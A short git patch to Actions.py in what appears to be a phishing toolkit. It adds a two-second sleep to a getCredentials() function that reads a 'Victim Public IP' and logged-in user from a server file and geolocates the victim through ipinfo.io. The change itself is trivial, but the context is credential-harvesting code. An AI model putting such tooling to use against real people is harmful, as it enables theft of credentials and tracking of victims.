From b8c256dd12bb67210410de570cc0f78c46864c31 Mon Sep 17 00:00:00 2001 From: Usama Abdul Sattar Date: Sat, 25 May 2019 12:06:43 +0500 Subject: [PATCH] Update Actions.py --- Defs/Actions.py | 1 + 1 file changed, 1 insertion(+) diff --git a/Defs/Actions.py b/Defs/Actions.py index 69bc540..19a5461 100644 --- a/Defs/Actions.py +++ b/Defs/Actions.py @@ -546,6 +546,7 @@ def getCredentials(): with open('Server/www/ip.txt') as creds: lines = creds.read().rstrip() if len(lines) != 0: + sleep(2) ip = re.match('Victim Public IP: (.*?)\n', lines).group(1) user = re.match('Current logged in user: (a-z0-9)\n', lines) resp = urlopen('https://ipinfo.io/{0}/json'.format(ip))